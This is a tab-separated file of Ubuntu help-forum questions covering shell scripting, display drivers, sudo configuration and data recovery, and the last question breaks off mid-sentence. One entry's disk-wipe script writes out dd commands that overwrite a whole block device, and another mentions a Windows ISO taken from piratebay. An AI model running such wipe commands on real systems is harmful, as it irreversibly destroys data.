425594	adding hours to an arbitrary , unformatted date	i need to add 84 hours to a specific starting utc date . the start utc date is the current date but the starting hour is not . the code below works great until the end of the month when it ca n't convert to the next month or the end of the year when it ca n't convert years . # date variables export start_year= $ ( date -u + % y ) export start_mon= $ ( date -u + % m ) export start_monc= $ { start_mon # 0 } # strip leading 0 export start_day= $ ( date -u + % d ) export start_dayc= $ { start_day # 0 } # strip leading 0 export start_hour= $ fhour # -- -- -- -this is either 6 , 12 , 18 , or 0 and here is where the problems start to appear : export end_hour= $ ( ( ( $ start_dayc*24+84 ) % 24 ) ) export end_day= $ ( ( $ start_dayc+ ( ( ( $ start_dayc*24 ) +84 ) /24 ) ) ) export end_mon= $ ( date -u + % m -d ' ( ( ( $ start_dayc*24 ) +84 ) /24 ) days ' ) export end_year= $ ( date -u + % y ) the extra variable start_monc is for calculation since the leading zero creates problems . the ending components need to be broken up like they are . my last resort is creating a series of if statements to change month/year appropriately . any suggestions to fix my month/year conversion problem ? thanks once again for putting up with my questions , great resource on this website .
425595	how to remap key with shift and alt modifier using xmodmap ?	i want to put have the following behaviour for key with code 94 : 1 ) by default it is ' < ' 2 ) with shift it is ' > ' 3 ) with alt it is '|' i only managed to get the default and shift behaviour by using command ( names are from xev ) : xmodmap -e `` keycode 94 = less greater '' i tried three thing to all of the behaviour : 1 ) xmodmap -e `` keycode 94 mod1 = less greater bar '' 2 ) xmodmap -e `` keycode 94 shift mod1 = less greater bar '' 3 ) xmodmap -e `` keycode 94 = less greater '' xmodmap -e `` add mod1 = less bar '' first two add the effect of having ' < ' by default and '| ' with shift . i 'm not entirely sure what the third one did . i also got the same behaviour as in 1 ) and 2 ) ( shift is relevant , alt does nothing ) from command : xmodmap -e `` keycode 94 mod1 = less bar '' my information is mostly based this answer ( especially the bonus section ) . how to map a single key to have a different default , shift and behaviour based on modifier ( s ) ?
425598	apt cacher wont do-release-upgrade for saucy	my sys ( raring ) is proxy client of my another machine hosting apt cacher . i 'm trying to do-release-upgrage and console saying 403 , sorry , not allowed to fetch that type of file : saucy.tar.gz and the command fails . ( im sure i can get out of this issue if i remove the proxy setting in my apt.conf.d but i really need to cache everything too . )
425600	kill sleeping process in mysql ?	i have a mysql database , which is very often filling with sleep process and i have to open my workbench and then have to kill them to free connections & then it will work fine . is there any way i can do that from command line ?
425604	there is a known bug for the wireless card for my lenovo thinkpad t440 running 12.04 . what are my options ?	i am trying to get wireless working on my lenovo thinkpad t440 , running ubuntu 12.04 . i think i have a realtek 818b wireless card . $ lspci | grep -i net 00:19.0 ethernet controller : intel corporation ethernet connection i218-v ( rev 04 ) 03:00.0 network controller : realtek semiconductor co. , ltd. device 818b it seems as if there is a known problem with the drivers for this wireless card . what are my options for what to do next ? update to a newer version of ubuntu ? wait for a bug fix ? i am fairly new to open source . what are my options in this situation ?
425612	ubuntu 13.10 big problem with privilegies	i have hp 14 chromebook ( with haswell celeron processor and 4 gb of ram , 4g ) , all is okay when i installed ubuntu 13.10 saucy with crouton script i did n't got any errors , but when i 'm trying to install something , it says that i do n't have privilegies , what should i do ? thanks !
425616	ubuntu image for gce	given that google compute engine has moved to providing just debian and centos images but does allow custom images has anyone documented how to create a ubuntu image that will run on gce ?
425618	installation ubuntu 13.10 throws a graphics error	i bought a new laptop - an acer e1-532g - and ca n't install ubuntu 13.10 . the laptop has a video card - amd radon rs m240 with with 1 gb dedicated ram . after installation , the os said to me : `` your screen , graphics card , and input device settings could n't be detected correctly . you will need to configure these yourself '' . after `` ok '' the screen displays - `` what would you like to do ? '' and the cursor does not move . how i can make a choice ? why is the graphics card not detected ?
425620	sudo , gksudo , kdesudo and their differences ?	what is the difference between sudo , kdesudo and gksudo , and when should i use each ? i know that sudo allows me to run both cli and gui functions , but i 've seen other people on websites using kdesudo and gksudo for gui functions .
425625	blank screen after rebooting the computer . how to boot to command prompt to fix the problem ?	i am new to ubuntu . please help me to fix the following problem . problem : after installing the ubuntu 13.10 server and ubuntu desktop i experienced temporary and permanent hang several times so i decided to use the different display diriver settings from settings- > software update- > additional driver . i do not remember what driver i selected . after rebooting my computer , all i can see now is the blank screen , i do not see the ubuntu desktop login screen . please let me know how can i boot to the command prompt so that i can reinstall all nvidia graphis drivers . also please let me know the solution for temporary hang if there is any . configuration of my dell e521 dimension desktop amd athlonâ˘ 64 x2 dual-core 3800+ 4gb ram ; nvidia geforce 6150 le integrated graphics gpu
425628	how do i resolve desktop larger than screen ?	edit - the file is being saved to the desktop but is being placed in the region above dvi-i-1 , i.e . the bit that is described by +0+261 offset . temporary solution is just to align monitors along the top end . is there a fix for this , is it a known issue or should it be made known to ubuntu/nvidia devs ? my desktop size is greater than my monitor size . consequently , when i save a document the icon is not available onscreen , although the file is present via an 'ls ' at the command line . i am running a dual monitor setup , see the output from 'xrandr -q ' below . ubuntu version 13.10 , graphics card , geforce gtx 650 ti/pcie/sse2 , driver is nvidia 's . i have tried running xrandr -- output dvi-i-1 -- mode 1600x1200 followed by xrandr -- output dvi-i-1 -- mode 1680x1050 in an attempt to reset the screen size appropriately but this makes no difference . i also include a dump of ~/.config/monitors.xml below which seems to my uneducated eye to be in order . can anyone suggest what i should try next to resolve this ? $ xrandr -q screen 0 : minimum 8 x 8 , current 2760 x 1920 , maximum 16384 x 16384 dvi-i-0 disconnected ( normal left inverted right x axis y axis ) dvi-i-1 connected primary 1680x1050+0+261 ( normal left inverted right x axis y axis ) 474mm x 297mm 1680x1050 60.0*+ 1600x1200 60.0 1400x1050 60.0 1280x1024 75.0 60.0 1280x960 60.0 1152x864 75.0 1024x768 75.0 70.1 60.0 800x600 75.0 72.2 60.3 56.2 640x480 75.0 72.8 59.9 hdmi-0 disconnected ( normal left inverted right x axis y axis ) dvi-d-0 connected 1080x1920+1680+0 left ( normal left inverted right x axis y axis ) 477mm x 268mm 1920x1080 60.0*+ 1680x1050 60.0 1440x900 75.0 59.9 1280x1024 75.0 60.0 1280x960 60.0 1152x864 75.0 1024x768 75.0 70.1 60.0 800x600 75.0 60.3 56.2 640x480 75.0 72.8 59.9 $ less ~/.config/monitors.xml < monitors version= '' 1 '' > < configuration > < clone > no < /clone > < output name= '' dvi-i-0 '' > < /output > < output name= '' dvi-i-1 '' > < vendor > hsd < /vendor > < product > 0x2469 < /product > < serial > 0x01010101 < /serial > < width > 1680 < /width > < height > 1050 < /height > < rate > 60 < /rate > < x > 0 < /x > < y > 261 < /y > < rotation > normal < /rotation > < reflect_x > no < /reflect_x > < reflect_y > no < /reflect_y > < primary > yes < /primary > < /output > < output name= '' hdmi-0 '' > < /output > < output name= '' dvi-d-0 '' > < vendor > ivm < /vendor > < product > 0x5620 < /product > < serial > 0x00001c82 < /serial > < width > 1920 < /width > < height > 1080 < /height > < rate > 60 < /rate > < x > 1680 < /x > < y > 0 < /y > < rotation > left < /rotation > < reflect_x > no < /reflect_x > < reflect_y > no < /reflect_y > < primary > no < /primary > < /output > < /configuration > < /monitors >
425629	how to limit resources to a shared ubuntu 10.04	the title might not be explanatory enough but i could n't find any better way to formulate it . i will be running a server for office use . it will host applications on tomcat . 2 differents people would be deploying the application they are working on ( office policy , all developers should be familiar with it ) . i know there is acl module at hdd level but i think it would be an overkill to do that for this purpose . beside its usage is not so clear to me as i would want to use it in a a way where i could list allowed actions like listed below , allowed for an user or group as opposed to listing the users/groups who are allowed for a particular resource/script etc . i would like to create a group which would be giving a particular set of privileges such as : create a folder in /opt/tomcat*/webapps * there could be different instances start/stop/restart a particular tomcat servive example service tomcat-1 start start/stop/reload/restart apache2 for reverse proxy purpose edit /etc/apache2/sites-available for reverse proxy purpose activate/deactivate sites using a2ensite or a2dissite how can i achieve that in ubuntu ? thanks in advance edit : thanks to bacon , i got some going . but i looks like there are few kinks . i created the users user1 , user2 , user3 and added them to the group deployers . all tomcat instances created with tomcat-user are inside /opt/tomcat7/ so i changed the user ownership of the folder to tomcat7 and the group owner ship to deployers and chmod to 775 . i have made a copy of /etc/init.d/tomcat7 to suit each of my instances and added them to update-rc.d . with visudo i have created deployers cmnd_alias and configured it as shown below : cmnd_alias deployers= /etc/init.d/tomcat_instance_1 , /etc/init.d/tomcat_instance_2 , /sbin/sh , /usr/bin/service % deployers all= ( all ) deployers i have logged in with user1 credentials and i still ca n't run /etc/init.d/tomcat_instance_1 start because it says `` you need root privileges ... '' . i thought the command alias would take care of that . can anyone shed the light thanks ?
425630	ubuntu login modification	from what i 've red i 'm legally allowed to modify my personal copy of ubuntu . correct me if i am wrong here though . so my question : i would like to edit how the user logs in . i am using the default 13.10 lightdm . i could not find the login/password text box processing part within lightdm though . to elaborate on what i am trying to achieve : take for example that i try to log in as a user 'test ' . the password for this user is 'mytestpassword ' . i would like to do something when the user enters foe example 'hint ' . as you see , this is not about the appearance of the login screen . i would appreciate if someone could point me in the direction of the files/ source code that has to be modified .
425632	discrepancy with swish++ names	i asked this question earlier , but i still have no answer . the problem is : i use ubuntu 12.04 , and i need to install swish++ from the source code . i 've downloaded the package from the official page of swish++ and configured it using the command make . the installation completed successfully , but i ca n't understand why there are no commands index++ and search++ . istead of that there are just index and search . when i tried to install swish++ using sudo apt-get install swish++ everything went ok : i had index++ and search++ . can anybody explain this to me ?
425640	how can i find a usb wireless adapter that will work with ubuntu 12.04	there is a bug for my wireless card on ubuntu 12.04 . there is a known bug for the wireless card for my lenovo thinkpad t440 running 12.04 . what are my options ? in order to get wireless on the machine running i will need to buy a usb wireless card . how can i find a usb wireless card that i can be 100 % sure will work with ubuntu 12.04 ? is there a list of known supported hardware ?
425643	12.04 no wireless ; thus installed 12.10 ; wo n't boot	i 'm quite sure many others had the same problem as me but i just ca n't quite understand it when i looked at the answers , so hopefully this thread can help me , in simple terms please . basically using a legit version of 12.04 cd i could install it perfectly , with the exception that wireless wo n't connect . i tried lots of commands but nothing would work . i tried upgrading to 12.10 since i saw a youtube video of a guy having the same laptop having the same problem with 12.04 and he said that 12.10 worked . i downloaded 12.10 from the ubuntu site and wrote to dvd . i then installed it , everything looked great . when i rebooted it however , it would ultimately get to a black page asking for my login and password . so i did that . what came next was : last login : blah blah welcome to ubuntu 12.10 ( gnu/linux 3.5.0-17-generic 1686 ) *documentation : http : //help.ubuntu.com/ system information as of mon feb 24 blah blah system load : 0.16 usage of / : 0.2 % of 450.40 gb ( what ? ? ? i have hdd 500gb ) memory usage : 0 % swap usage : 0 % processes : 129 users logged in : 0 graph this data and manage this system at htpp : //landscape.canonical.com/ new release '13.04 ' available . run 'do-release-upgrade ' to upgrade to it . the programs included with the ubuntu system are free software ; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright ubuntu comes with absolutely no warranty , to the extent permitted by applicable law . cindyseah @ ubuntu123456789 : ~ $ i 'm dying here . please help me . my laptop 's been dead ( like , not booting to desktop ) for more than a month now . a student really needs her laptop .
425647	how to install zip package from cd on ubuntu server using command line ?	i installed ubuntu server , do n't have internet connection but have .zip package on a cd . how do i install it ? mounted the cdrom already and can see the application
425650	dumping a windows hibernation in ubuntu	for future reference and saving me a bunch of time , i would like to know how to dump a windows hibernation on its physical partition , so i can mount it 's volume as rw without having to reboot my rig , starting the resume , dumping it , and rebooting back to linux . thanks again : )
425652	ubuntu 13.10 64bit version only shows 2.9gb of ram	i have an old pc at home with 1.5 gb of ram and as expected its quite slow . so i decided to install ubuntu on a different pc . intel quad core and 4 gb of memory , and a graphic card with dedicated memory . i installed the 64 bit version . i also notice its much slower that running windows 7 ( that was unexpected ) and ubuntu only seems to recognize 2.9 gb . ive been searching this forum , i see chat about bad memory and installing 32 bit version . i 've run memtest and no errors there . i 've made sure i have 64 bit version installed . what else can i do ? follow up : so after the reply from ( mrvaykadji - thanks : ) ) here are the results : speed @ testing : ~ $ arch x86_64 speed @ testing : ~ $ free -h | awk 'nr > 0 { arr [ $ 2 ] } end { for ( i in arr ) print i } ' | grep g 2,9g speed @ testing : ~ $ sudo lshw -class memory | grep gib [ sudo ] password for speed : size : 4gib size : 2gib size : 2gib it all seems to me to be 64bit system . what now ? ! please ... anyone knows how to fix this ?
425653	what can be skipped during installation ?	during installation of ubuntu i clicked the skip button like a maniac , because i had nothing better to do . assuming that i skipped everything that can be skipped . what did i skip ?
425657	ubuntu operated from raspberry pi , is it possible ?	is it possible to have ubuntu put onto a 32gb sd card and be operated from a raspberry pi
425658	my laptop keeps showing ubuntu 13.10 faced some problem , send report also i 'm unable to connect to internet	my ubuntu 13.10 is facing few problems . it hangs from time to time , also showing this application not running properly . also , i live in hostel , here we have proxy connection . so , i 'm not able to connect ubuntu with proxy server . firefox connects to server after setting so does software center ( but it only shows apps , they are not downloaded ) . rest all does not connect . i 'm unable to download any app too , as software center does not so download option . ubuntu one is unable to connect so i cant login too . please help me , i 'm new to ubuntu and do n't know commands too .
425660	german special characters on us/hebrew keyboard	israeli keyboards come in us layout with hebrew added in a different color , and toggling between character sets is usually done with alt_shift . for the german special characters there used to be alt_number combinations under dos and different alt_number combinations under windows , and also different combinations in the different word processors . for quite sometime , i have been using ubuntu and yet another set of number combinations - ctrl_shift_u_df = ß , ctrl_shift_u_c4 = ä , ctrl_shift_u_e4 = ä , ctrl_shift_u_d6 = ö , ctrl_shift_u_f6 = ö , ctrl_shift_u_dc = ü , ctrl_shift_u_fc = ü , all found here . and now comes ubuntu 13.10 , hebrew-english toggling is suddenly tricky , and gone are ä , ä , ö , ö , while ü , ü , and ß are there as they were , but the first key typed after one of them does not show on the screen , i hope does not do some invisible mischief . i understand that ubuntu 14.04 is less than two months away and will probably provide a satisfactory answer to everybody 's complaints , but maybe there is some specialkey_number combo out there that everybody except me and the online complainers already knows ? changing to german keyboard layout is not an option - easy to set up but too hard to live with . i tried , years ago .
425661	xfce made eclipse look weird	i am running ubuntu 12.04 and installed xfce 4.10 . ever since then eclipse looks pretty much unusable as you can see below i can not even see the filenames of the tabs i have open because they are so faint . any ideas how that is caused ? i even went to appearance and tried to switch everything to default but eclipse still looks super weird .
425665	chaging monitor resolution	ubuntu 12.04 . what values should be used to get 1920x1080 resolution ? the man for xrandr is not clear how to select the numbers ? any pointers how to decide the numbers ?
425666	how can i generate tags file with exuberant ctags in ubuntu 's c/c++ include directories for using with gvim ?	i use gvim 7.4 with tdm-gcc 64 in windows 7 . i know the include directories of this compiler , and added the paths suitably to gvim 's tags search path . everything is fine in windows . but i am new to ubuntu , i currently installed ubuntu 13.10 ( saucy ) , but a bit confused about the compiler 's include directories . i found some of these directories are : /usr/include /usr/src /usr/local/include /usr/include /usr/lib/gcc/i686-linux-gnu/4.8 /usr/lib/gcc/x86_64-linux-gnu/4.8/include finally i created a shell script as follows : # ! /bin/sh cd /usr/include sudo ctags -r -- c-kinds=+pxfvtcdeglmnsu -- c++-kinds=+pxfvtcdeglmnsu -- languages=c , c++ -- langmap=c : .c.h -- langmap=c++ : .c.h.c.cpp.hpp.c++.cc.cp.cxx.h++.hh.hp.hxx -- fields=+iasm -- extra=+qf -f tags * cd /usr/src sudo ctags -r -- c-kinds=+pxfvtcdeglmnsu -- c++-kinds=+pxfvtcdeglmnsu -- languages=c , c++ -- langmap=c : .c.h -- langmap=c++ : .c.h.c.cpp.hpp.c++.cc.cp.cxx.h++.hh.hp.hxx -- fields=+iasm -- extra=+qf -f tags * cd /usr/local/include sudo ctags -r -- c-kinds=+pxfvtcdeglmnsu -- c++-kinds=+pxfvtcdeglmnsu -- languages=c , c++ -- langmap=c : .c.h -- langmap=c++ : .c.h.c.cpp.hpp.c++.cc.cp.cxx.h++.hh.hp.hxx -- fields=+iasm -- extra=+qf -f tags * cd /usr/include sudo ctags -r -- c-kinds=+pxfvtcdeglmnsu -- c++-kinds=+pxfvtcdeglmnsu -- languages=c , c++ -- langmap=c : .c.h -- langmap=c++ : .c.h.c.cpp.hpp.c++.cc.cp.cxx.h++.hh.hp.hxx -- fields=+iasm -- extra=+qf -f tags * cd /usr/lib/gcc/i686-linux-gnu/4.8 sudo ctags -r -- c-kinds=+pxfvtcdeglmnsu -- c++-kinds=+pxfvtcdeglmnsu -- languages=c , c++ -- langmap=c : .c.h -- langmap=c++ : .c.h.c.cpp.hpp.c++.cc.cp.cxx.h++.hh.hp.hxx -- fields=+iasm -- extra=+qf -f tags * cd /usr/lib/gcc/x86_64-linux-gnu/4.8/include sudo ctags -r -- c-kinds=+pxfvtcdeglmnsu -- c++-kinds=+pxfvtcdeglmnsu -- languages=c , c++ -- langmap=c : .c.h -- langmap=c++ : .c.h.c.cpp.hpp.c++.cc.cp.cxx.h++.hh.hp.hxx -- fields=+iasm -- extra=+qf -f tags * but this script is generating a gigantic huge tags file , consequently vim is getting slower while searching functions , variables , struct , prototypes etc . when i am pressing `` < c-x > < c-o > '' or tab ( i configured omni-completion to tab ) , vim is freezing for a while then suggesting the content i am looking for . finally i decided to discard the recursive ( -r ) option , but my question is : 1 ) what are the actual include directories in ubuntu ? 2 ) where should i use recursive and where not ? 3 ) many directories are not generally needed , such as '/usr/src/ ' or '/usr/src/nvidia-331.38' which mostly contains linux headers and nvidia driver functions . what are these type of directories so that i can list it in my .vimrc as the last option ? i am looking for a solution to find everything ( functions , variables , struct ) without having to slow down vim . thanks in advance .
425667	www links not working in apache	i have setup my apache virtualhosts like this below , https : //sub.domain.com works but if i try https : //www.sub.domain.com it doesnt work with the www . before the domain i assume this is serveralias ? i think it set it up correctly though.. < virtualhost *:443 > serveradmin webmaster @ localhost servername sub.domain.com serveralias www.sub.domain.com ... ... < /virtualhost > < virtualhost *:443 > serveradmin webmaster @ localhost servername sub2.domain.com serveralias www.sub2.domain.com ... ... < /virtualhost >
425670	disk wipe script question	i have a server setup to do diskwipe . i am wondering if someone can help me figure out why the random pass is not working . thanks ! ! # textpass sectors sectors= $ ( blockdev -- getsz /dev/ $ drive ) echo `` filling target drive with : 0x01 '' dd if=/dev/zero count= $ sectors bs=512 | bar -of /dev/ $ drive time_passtwo= $ seconds echo `` '' | tee -a log_ $ serial echo `` pass 2 : 0x01 completed in '' $ time_passtwo | tee -a log_ $ serial # randpass echo `` '' echo `` filling target drive with random characters '' dd if=/dev/erandom count= $ sectors bs=512 | bar -of /dev/ $ drive time_passthree= $ seconds echo `` '' | tee -a log_ $ serial echo `` pass 3 : random completed in '' $ time_passthree | tee -a log_ $ serial echo `` done.. logging details . '' echo `` '' echo `` '' > > log_ $ serial echo `` dod wipe and verify completed in approx : `` $ seconds `` seconds `` > > log_ $ serial echo `` final s.m.a.r.t log , check for any uncorrectable disk errors `` > > log_ $ serial final log echo `` '' smartctl -t short /dev/ $ drive ; sleep 3m ; smartctl -x /dev/ $ drive > > log_ $ serial
425671	how to lists different image-formats recursively in a tree ?	how would i efficiently go about searching for .png | .svg | .xpm image-files in a complex and recursively structured hierarchy in one query , using terminal ( and if possible | ( pipe ) tree in the same query , to get a nice output/overview , like in the example below : ├── arrows │ ├── submenu01.png │ └── submenu02.png ├── awesome ├── 01 │ ├── ac.png │ ├── awesome.png │ ├── bat_low.png │ ├── bat_no.png │ │ ├── close_normal_all.png │ │ ├── floating_focus_inactive.png │ │ ├── floating_normal_active.png │ ├── vol_low.png │ ├── vol_mute.png │ ├── vol_no.png │ ├── vol_up.png │ └── widget_bg.png ├── antilight_by_sunjack94-d3ddff6.tar ├── as_it_fades_by_synorgy.png i 'd like to do this in : /usr/share/ any help is highly appreciated , even if it does n't fully fit my request !
425675	virtualizing windows 7 with qemu-kvm sata issues	i am working on virtualizing a windows 7 image using kvm on ubuntu 12.10 64 bit . here are the specs for my machine : cpu : intel i7-2860wm ,8g ram i am using an image created with winimage of a windows 7 ultimate 64bit machine . i am able to create a virtual machine and run it successfully using the `` virt-manager '' tool . in order for the image to run correctly i must specify the disk bus type as sata , otherwise when the virtual machine tries to boot i receive a bsod with an error code of 0x0000007b which pertains to errors initializing the hard disk . i would like to be able to create/start this virtual machine from the cmd line using kvm instead of using the virt-manager utility . however when i try the following : sudo kvm -hda win7.vhd the machine boots and immediately goes to a bsod with an error code of 0x0000007b . i need a way from the command line to specify the virtual machine to use a sata bus . or so i need to create a virtual sata bus and have it boot from the win7.vhd image ? basically i need to be able to specify sata as the bus option from the command line , but i have not had any luck with this . any and all thoughts are appreciated !
425679	how to fix , ubuntu is running is low-graphics mode	i 'm running ubuntu 12.04 . i get the error message ubuntu is running in low-graphics mode . your screen , graphics card , and input devices could not be detected correctly . you will have to configure these yourself . at this juncture , the computer is unresponsive . my only course of action is to try commands from the terminal .
425687	no login box for xrdp	i am trying to connect to my linux desktop using rdp from a windows 7 laptop . i have installed xrdp and this is running . connecting using rdp client in windows brings up a blank screen with no login option for xrdp . i also have the same problem when trying to connect with a vnc viewer - the viewer connects and authenticates but i only see a black screen . i need one of these options to work - no preference though . help ! ( please : - ) )
425688	firefox wont show logs in browser	i have some log files i posted to my web-server . when i navigate to them , i get prompted to download and open with a text editor . on other distributions like fedora , and m $ , the log opens in the browser , and i read it there . how can i get this functionality in ubuntu ? example : http : //nanocluster.umeche.maine.edu/e.log
425689	is the latest provided php5 package in an lts distribution secure ?	i need to update php5 on a 12.04 lts production server . the latest candidate provided is 5.3.10-1ubuntu3.9 . is that version patched to be secure for use in a production environment ? php is up to 5.5.3 already and will prove quite a hassle to upgrade to . i would expect an lts release to provide packages that will be patched with security fixes , but i can not find a conclusive answer on this .
425690	how do i open a click package ?	i created a small app with the ubuntu sdk and packaged it into a click package . i am curious about what is in it . how can i open it ? the archive manager says it does not recognize it and the ubuntu software center ( ubuntu desktop 13.10 ) reports that the file could not be opened .
425693	how to add my user account to admin group ( 13.10 desktop )	i was trying to extract a web template into the hosting folder /docroot on the web service , which is working , however i do not have permission to complete the action . i can not stand being locked out of anything on a machine , and before you all go on a rant about why the root account is locked yadda yadda , dont , just dont . so ... did a sudo visudo # user privilege specification root all= ( all : all ) all username all= ( all : all ) all saved as tmp and then as sudoers , checked the files , both sudoers and sudoers.tmp same size still no joy , can not access required folders and files . rebooted , no go i was about to start editing the passwd files next , but thought i best ask what might be going on here as i am not entirely familiar with ubuntu 13.10 desktop and unity . this is not a production machine , only experimenting with web services and the available web production tools . i get the root account is locked and sudo 'ing every command from the command line is not an option , just aggro . if anyone can offer a ( even if unsecured ) solution to this permissions issue i would be very grateful . i do not care about breakage , please do not lecture , i can re-image this unit in less than 20 min . i tried adding my account to the admin group as well , only to get an error saying the admin group does n't exist . # members of the admin group may gain root privileges % admin all= ( all ) all huh ? yep , confused . tia
425704	modify indicator - increase distance between icon and text	this is my second question about theming an indicator-applet . with the theme i 'm using ( flatstudio , it does n't matter if grey , dark etc ... ) , there is one small annoying bug : the distance between the icon for the battery and the text is too small ( see screenshot ) . the same thing happens for the online-status icons ... what css files do i have to edit , in order to increase this distance ?
425705	crackling sound on hdmi output ubuntu 13.04	when using my new laptop 's hdmi port to stream a/v to a onkyo stereo , the sound is crackling . it is n't the cable . under settings- > sound , i choose hdmi/displayport2 , in digital surround 5.1 output mode . the sound tests , does play on the correct loudspeakers , but it is crackling and noisy . i have logged my alsa information with www.alsa-project.org .
425706	how can i save frames from an ip camera to disk on demand ?	i have an ip camera that is running correctly . i can open http : its.address.com/videostream.cgi in my browser and view the video successfully . now i would like to create a program or script that saves x seconds worth of video whenever i run it . i thought maybe vlc would do this , but i get no suitable decoder module for fourcc 'mjpg ' . vlc probably does not support this sound or video format . i reinstalled vlc with apt-get and get the same result . what is the best tool for the job of recording frames on demand ? if it is vlc , how do i get mjpg support ? ( ubuntu 12.04 )
425707	dual boot windows 7 and encrypted ubuntu with lurks	as the title suggests i want to install windows 7 and ubuntu 13.10 on my 3tb harddrive . i managed so after pre-formatting the drive with a gparted on ubuntu live giving windows the first 2tb and leaving the rest for the ubuntu installation . windows then installed without problems and started just fine . i then installed ubuntu ( encrypted ) using this wiki article - i was not able to find the english page but it basically tells you to first partition the ( remaining ) harddrive into a small part for boot and a remainder for the lurks-partition . then run the commands on the lurks partition making a group called vgubuntu with a root/swap part ( i also made a home part ) . then run the installation but do not restart after . and then continue running the commands starting at `` ins verschl端sselte system wechseln '' which - if i understood correctly - configure the usage of the lurks partition . but now come the problems - after restarting i was not greeted by the expected grub selection menu asking me which os to start , but a `` unknown file system grub rescue prompt '' . i already tried : - boot-repair which will after running without any error result in only the windows system being started directly - reinstalling grub using the wiki article but it did not work without errors ( also having the error `` can not resolve canonical path to /cow '' when running grub-update ) . current harddrive : /dev/sda1 ntfs 1.9tb /dev/sda2 ext4 1gb ( boot ) /dev/sda3 crypt-luks 840 gb ( containing swap/root/home ) i was able to use the given tutorial for installing encrypted ubuntu without windows , but as soon as i install windows beforehand all goes down . as i am already pass 3 ( different ) attempts of making this work i 'd appreciate an answer rescuing the current installed systems and not making me redo all the work .
425710	how can i determine the available amount of disk space when using a charm ?	when using juju to deploy a db , how can i determine the available amount of disk space when using the db charm ? suppose that i 'm using ec2 ( or anywhere else ) to deploy a postgresql/mysql/whateverdb charm ... where will the actual database data be stored ? will the charm create a ebs volume and attach it to the instance and put the data there ? what if my database is very large ? or very small ? where can i determine the size of the available storage ? thanks ! !
425711	what is the bootstrap.sh script ?	i am trying to install cabal-install . readme says i should use bootstrap.sh to download and install the dependencies . it says i should use this script like below $ ./bootstrap.sh but i could n't find such script in / so , the question is , what is the bootstrap.sh script , what is its purpose and where to get it ?
425715	datarecovery attempt to read block from filesystem resulted in short read while opening filesystem	i have following problem : i accidently deleted some files on my ubuntu . when i try to use debugfs to recover my files i get following error : attempt to read block from filesystem resulted in short read while opening filesystem i really need help as i do n't know how to solve this ! the files are very important to me !
425716	how to use telegram with any im app	i want to work on a small app that will use telegram from within ubuntu but wanted to first know if there was already a work in progress for this since i noticed that , for example , pidgin was support for whatsapp . with this in mind , is there a messenger app that has support ( even basic support ) for telegram from within ubuntu .
425717	universal usb installer problem	i downloaded a windows 8.1 iso from piratebay . i am trying to boot my usb from ubuntu , but in the universal usb installer the iso file comes up fine but it will not recognize my usb . i have tried multiple usb 's and different ports . any help you can give me is much appreciated !
425718	recoll - disable full text indexing	i like the gui and everything , but i have no interest in full text indexing by recoll i want only location of the file i am looking for and maybe size in my results it seems like i should be able to disable it through settings which files to index , but i am not sure if just mask * . * would stop this
425720	how to unmount when umount hangs due to disconnected disk ?	i have an external disk connected via usb that was accidentally disconnected uncleanly . now lsing the directory in which it was mounted gives input/output error . umounting the directory simply hangs . dmesg just contains : [ 3360010.363235 ] usb 2-1.1 : usb disconnect , device number 3 how do i resolve this ( short of rebooting ) , i.e . how do i clean up kernel state upon unclean disconnect of an external storage device ?
425723	losing drivers and functionality on ubuntu	i have a machine that runs ubuntu 13.10 . it has been slowly but surely losing system functionality for a couple of months . application center stopped working a couple of months ago because x drawable disappeared . now the clock functionality is gone and it can no longer play sound at all . is this a problem with my install ? i am using an asus x201ep that i bought from cdw 9 months ago . intel 847 processor and 3.7 gb ram ... not sure if that 's relevant here 's the output lspci -nnk | grep -ia2 vga : 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0106 ] ( rev 09 ) subsystem : asustek computer inc. device [ 1043:108d ] kernel driver in use : i915 when i tried downloading the linux graphics installer and running sudo dpkg -i [ filename ] i got this output ( reading database ... 254111 files and directories currently installed . ) unpacking intel-linux-graphics-installer ( from intel-linux-graphics- installer_1.0.3_amd64.deb ) ... dpkg : dependency problems prevent configuration of intel-linux-graphics-installer : intel-linux-graphics-installer depends on libpackagekit-glib2-16 ( > = 0.8.10 ) ; however : package libpackagekit-glib2-16 is not installed . intel-linux-graphics-installer depends on ttf-ancient-fonts ; however : package ttf-ancient-fonts is not installed . dpkg : error processing intel-linux-graphics-installer ( -- install ) : dependency problems - leaving unconfigured processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for gnome-menus ... processing triggers for mime-support ... processing triggers for desktop-file-utils ... errors were encountered while processing : intel-linux-graphics-installer i tried modifying the grub as the tutorial johnnyd . recommended and now i can no longer load gnome and i get 'could not open x display ' and 'could not find display 0 ' ... i would post full output but i am posting from my phone cause i ca n't open chromium
425726	executing c++ program on geany	i recently installed kubuntu 12.04 lts and i 'm fairly new to geany . i 've used it on other computers but never installed it myself until now . now , i have c++ code that i 've run on other machines ( also on geany ) , so i know it 's not the code 's fault . i have installed all the packages i think are needed and here 's the situation : using geany i can compile and build the code ; executable runs perfectly if run by terminal ( konsole ) ; if i try to run using geany ( that rocket button or shortcut key ) , it opens a terminal window and shows just a `` $ '' . the title of the window is `` sh - konsole '' ; it also runs ok if i run it on the terminal on geany 's application , so it seems i really need to enter the command ; i 've checked the build properties and it seems fine . there 's `` ./ % e '' on the execute command . this is the result of running the program by clicking the rocket button or pressing f5 : http : //imageshack.com/a/img547/2711/ik7q.png [ solution ] : edit > preferences > tools and set terminal to `` konsole -- workdir . -e sh -c '' thank you all . every answer was appreciated .
425727	data recovery problem	i 'm new at linux , so i promise no matter how simple the answer is , it will all be news to me . i 've found a lot of questions online similar to mine , but i 'm not having much luck with results . this system is presently running ubuntu 13.10 and nothing else . my girlfriend sold her laptop recently and prior to doing so she put about 10gb worth of data on my linux machine . recently the computer crashed and no longer boots up . i am running linux off of an 8gb usb drive . i loaded the operating system by doing try linux . what i am trying to do is recover her 10gb of family photos . the rest of everything is irrelevant to me . on the left side is an image of the hard drive labeled 496 gb volume . clicking this does nothing . if i go to files , it is also under devices , but if i click it what i get is a floating box that states unable to access `` 496 gb volume '' error mounting /dev/sda1 at /media/ubuntu/9cca38c7-f6ee-41fc-95bc-c5817c0844c3 : command-line `mount -t `` ext4 '' -o `` uhelper=udisks2 , nodev , nosuid '' `` /dev/sda1 '' `` /media/ubuntu/9cca38c7-f6ee-41fc-95bc-c5817c0844c3 '' exited with non-zero exit status 32 : mount : wrong fs type , bad option , bad superblock on /dev/sda1 , missing codepage or helper program , or other error in some 